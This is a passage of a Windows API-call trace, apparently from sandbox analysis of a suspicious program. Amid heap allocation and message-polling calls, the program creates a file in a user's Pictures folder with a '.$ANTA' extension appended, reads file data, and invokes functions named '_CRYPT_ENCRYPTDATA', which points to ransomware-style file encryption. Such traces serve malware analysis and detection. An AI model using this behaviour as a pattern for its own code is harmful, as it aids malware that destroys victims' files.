RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0092.992] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0092.992] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0092.992] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0092.992] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0092.992] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0092.993] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0092.993] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0092.993] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac700 [0092.993] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0092.993] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac700 | out: hHeap=0x1780000) returned 1 [0092.993] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0092.993] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0092.993] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0092.993] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0092.993] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0092.993] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0092.993] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0092.993] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0092.993] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0092.993] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0092.993] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796d88 [0092.993] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d88 | out: hHeap=0x1780000) returned 1 [0092.993] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0092.993] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0092.993] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0092.993] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0092.993] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0092.993] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0092.994] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0092.994] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0092.994] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0092.994] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0092.994] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0092.994] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0092.994] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0092.994] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0092.994] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0092.994] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9260 [0092.994] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0092.994] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a4b68 [0092.994] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0092.994] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8cc0 [0092.994] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0092.994] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8ac8 [0092.994] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a4b68 | out: hHeap=0x1780000) returned 1 [0092.994] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0092.994] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0092.994] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0092.994] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9260 | out: hHeap=0x1780000) returned 1 [0092.994] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0092.995] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8cc0 | out: hHeap=0x1780000) returned 1 [0092.995] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0092.995] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0092.995] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0092.995] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0092.995] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x436a240 [0092.995] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\" (normalized: "c:\\users\\fd1hvy\\pictures\\cliksz")) returned 0x10 [0092.995] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x436a240 | out: hHeap=0x1780000) returned 1 [0092.995] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0092.995] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8ac8 | out: hHeap=0x1780000) returned 1 [0092.995] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0092.995] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0092.995] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0092.995] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac700 [0092.995] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x4506008 [0092.995] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0092.995] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0092.995] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\9Y-cpSQgv6l3vMS-rl5.png.$ANTA" (normalized: "c:\\users\\fd1hvy\\pictures\\cliksz\\9y-cpsqgv6l3vms-rl5.png.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0092.996] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0092.996] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0092.996] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0092.996] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0092.996] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0092.996] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0092.996] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0092.996] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0092.996] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0092.996] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0092.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0092.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0092.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0092.997] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0092.997] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0092.997] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0092.997] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0092.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac780 [0092.997] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0092.997] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac780 | out: hHeap=0x1780000) returned 1 [0092.997] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0092.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac780 [0092.997] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0092.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0092.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0092.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0092.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0092.997] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0092.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0092.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0092.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0092.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e28 [0092.997] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e28 | out: hHeap=0x1780000) returned 1 [0092.998] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0092.998] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0092.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0092.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0092.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0092.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x3e0c020 [0093.001] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144eca8 | out: lpNewFilePointer=0x0) returned 1 [0093.002] ReadFile (in: hFile=0x258, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ecd0, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144ecd0*=0x9ea4, lpOverlapped=0x0) returned 1 [0093.003] ReadFile (in: hFile=0x258, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ecd0, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144ecd0*=0x0, lpOverlapped=0x0) returned 1 [0093.003] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0093.003] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0093.003] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0093.004] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0093.004] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x9ea4) returned 0x4516010 [0093.004] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e0c020 | out: hHeap=0x1780000) returned 1 [0093.007] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0093.007] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0093.007] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0093.007] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0093.007] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0093.007] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x9ea4) returned 0x451fec0 [0093.007] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0093.007] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0093.007] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0093.007] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0093.007] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0093.007] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0093.008] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0093.008] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0093.008] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x9ea4) returned 0x4516010 [0093.008] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0093.008] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0093.008] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0093.008] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0093.008] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0093.008] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0093.008] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0093.008] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0093.008] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0093.008] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ee8 [0093.008] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ee8 | out: hHeap=0x1780000) returned 1 [0093.008] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0093.008] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0093.008] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac100 [0093.008] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0093.008] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0093.008] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0093.008] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391ab8 [0093.008] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0093.009] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391ab8 | out: hHeap=0x1780000) returned 1 [0093.009] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0093.009] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0093.009] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2660 [0093.009] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0093.009] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0093.009] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0093.009] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0093.009] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x9ea4) returned 0x4516010 [0093.009] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0093.009] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e26f0 [0093.009] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0093.009] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0093.009] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0093.009] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2700 [0093.009] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0093.009] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0093.009] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0093.009] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e25a0 [0093.009] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0093.009] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0093.010] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0093.010] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca850 [0093.010] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0093.010] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0093.010] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0093.010] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0093.010] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0093.010] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x9ea4) returned 0x4529d70 [0093.010] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0093.010] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0093.010] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0093.010] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0093.010] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0093.010] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0093.010] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0093.010] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0093.010] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0093.010] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0093.010] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0093.010] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0093.010] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0093.010] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0093.011] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0093.011] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0093.011] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0093.011] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0093.011] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0093.011] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0093.011] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41abfc0 [0093.011] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0093.011] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff90 [0093.011] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0093.011] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2900 [0093.011] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0093.011] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffb8 [0093.011] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0093.011] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0093.011] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0093.011] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0093.011] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0093.011] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8be8 [0093.011] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0093.011] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8be8 | out: hHeap=0x1780000) returned 1 [0093.011] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0093.011] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01c0 [0093.012] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2890 [0093.012] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdb0 [0093.012] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0093.012] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0093.012] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0093.012] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca820 [0093.012] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffe0 [0093.012] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0093.012] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27a0 [0093.012] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0093.012] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe00 [0093.012] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0093.012] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9260 [0093.012] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0093.012] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff18 [0093.012] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0093.012] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0093.012] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0093.012] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0093.012] RtlAllocateHeap (HeapHandle=0x1780000, 